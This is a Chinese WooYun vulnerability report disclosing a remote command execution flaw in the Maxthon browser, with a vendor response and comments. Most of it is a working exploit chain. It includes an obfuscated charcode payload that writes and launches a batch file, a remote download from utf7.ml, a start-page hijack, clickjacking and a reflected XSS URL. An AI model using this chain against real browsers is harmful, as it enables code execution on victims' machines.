当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105477

漏洞标题:傲游浏览器远程命令执行漏洞

相关厂商:傲游

漏洞作者: Lyleaks

提交时间:2015-04-02 21:37

修复时间:2015-07-01 23:00

公开时间:2015-07-01 23:00

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-02: 厂商已经确认,细节仅向厂商公开
2015-04-05: 细节向第三方安全合作伙伴开放
2015-05-27: 细节向核心白帽子及相关领域专家公开
2015-06-06: 细节向普通白帽子公开
2015-06-16: 细节向实习白帽子公开
2015-07-01: 细节向公众公开

简要描述:

傲游浏览器某缺陷配合clickjacking可导致远程命令执行

详细说明:

傲游浏览器打开RSS时会使用自身的RSS阅读器,如图。

1.jpg


尝试把URL改为

mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?javascript:alert(location.href)


2.jpg


点击标题的时候JS被执行。
想了一下,要利用这个漏洞,可以使用点击劫持来做。虽然Internet域不能访问MX域,不过File域却可以。
所以可以通过向File域写入一个HTML文件,使用iframe来嵌入MX域。
要向File域写入文件,可以使用傲游的API。

external.mxCall('InstallApp', "http://utf7.ml/t/exec1.html");


调用该接口会向Temp目录写入文件,使用下面的接口来获取完整的路径

maxthon.system.Environment.getFolderPath('Mx3data');


接下来只需要访问该文件,用户点击的时候就可以执行任意命令了。
所以大概的流程就是
用户访问一个URL => 调用接口下载恶意的HTML => 将该HTML文件设置为主页 => 用户打开浏览器,点击首页任意位置 => 执行攻击者设置的命令
所以构造如下POC

external.mxCall('InstallApp',  "http://utf7.ml/t/exec1.html");
var url = maxthon.system.Environment.getFolderPath("Mx3data")+"Temp/exec1.html";
maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.startpage",url);


exec1.html源码如下

<style>
html, body {
  background: url(http://utf7.ml/t/bg1.jpg);
  cursor: pointer;
}
#box, #box > * {
  position: absolute;
  width: 300px;
  height: 50px;
  border: 1px solid red;
  opacity: 0;
}
#victim {
  border: none;
}
</style>
<div id="box">
  <iframe id="victim" src="mx://res/app/%7B4F562E60-F24B-4728-AFDB-DA55CE1597FE%7D/preview.htm?javascript:eval(String.fromCharCode(118,97,114,32,97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,97,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,97,112,112,47,37,55,66,51,51,67,65,54,48,68,54,45,69,65,68,67,45,52,53,53,56,45,57,49,56,53,45,50,69,66,69,49,52,50,49,52,65,66,57,37,55,68,47,105,110,100,101,120,46,104,116,109,34,59,97,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,98,61,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,70,105,108,101,46,99,114,101,97,116,101,84,101,109,112,70,105,108,101,40,41,59,98,46,110,97,109,101,95,32,61,32,34,68,58,47,116,101,115,116,46,98,97,116,34,59,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,70,105,108,101,87,114,105,116,101,114,40,98,41,59,97,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,105,111,46,119,114,105,116,101,84,101,120,116,40,34,99,109,100,32,47,107,32,100,105,114,34,41,59,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59,115,101,116,84,105,109,101,111,117,116,40,39,118,97,114,32,99,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,99,46,115,114,99,61,34,109,120,58,47,47,114,101,115,47,110,111,116,105,102,105,99,97,116,105,111,110,47,34,59,99,46,111,110,108,111,97,100,61,102,117,110,99,116,105,111,110,40,41,123,99,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,109,97,120,116,104,111,110,46,112,114,111,103,114,97,109,46,80,114,111,103,114,97,109,46,108,97,117,110,99,104,40,34,68,58,47,116,101,115,116,46,98,97,116,34,44,34,34,41,125,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,41,59,39,44,49,48,48,48,41,59))" scrolling="no"></iframe>
</div>
<script src="https://code.jquery.com/jquery-1.11.0.min.js"></script>
<script>
$(document).mousemove(function(e) {
  var x = e.pageX;
  var y = e.pageY;
  $('#box').css({left: x - 170, top: y - 35});
});
</script>


这里只是用于演示,所以我只是截了一张i.maxthon.cn的图片作为背景。
实际利用的时候可以做的更有欺骗性。
PS:图片放在国外的空间,如果测试的时候刷不出图片,把图片传到到国内的服务器就行
通过如下URL调用POC

http://web.maxthon.cn/appeal/appeal.php?q=%22%3E%3Cscript%20src=http://utf7.ml/t/maxthon3.js%3E%3C/script%3E


漏洞证明:

访问上面的URL后,当受害者再次打开浏览器时,首页被修改如下图。

3.jpg


点击首页任意位置,即可执行命令。

4.jpg


测试环境
傲游4.4.4.3000 + Win8.1

5.jpg


傲游4.4.5.600_beta + Win8.1

6.jpg


修复方案:

版权声明:转载请注明来源 Lyleaks@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-02 22:58

厂商回复:

感谢. 网站漏洞+内部页面漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-02 22:06 | 数据流 ( 普通白帽子 | Rank:716 漏洞数:88 | all or nothing,now or never)

    洞主又来虐遨游啦。。

  2. 2015-04-02 22:07 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    洞主的思路很优秀

  3. 2015-04-08 00:11 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    等待哈。